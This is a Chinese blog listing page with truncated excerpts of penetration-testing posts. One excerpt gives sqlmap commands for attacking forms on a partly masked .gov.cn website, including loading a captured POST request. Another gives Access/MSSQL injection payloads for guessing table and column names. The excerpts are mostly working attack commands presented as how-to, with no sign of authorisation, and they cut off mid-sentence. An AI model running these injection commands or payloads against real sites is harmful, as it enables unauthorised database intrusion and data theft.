MyBack

第一种方式， 就是让sqlmap去自动获取表单: sqlmap -u "http://www.xxxxxxxx.gov.cn/bxcxnew1.aspx" --forms 一般情况下就一直按回车就好了。 第二种， 爪好POST包后存在一个文件中， 再用 -r 参数读取， 这种方式的好处是不易出错， 当一个页面有多个表单时， 能正确指引。 把以上内存复制保

当网站是access或mssql时， 一们一般是猜表名开始: http://www.test.com/test.asp?id=1 and exists(select * from 要猜的表名) 当猜出表名时， 我们再猜字段: http://www.test.com/test.asp?id=1 and exists(select 要猜的字段 from 猜对的表名) 当以上两步

本人博客已迁至: http://www.linux-info.org 喜欢perl, linux, 渗透， 编程的可以看看， 一起交流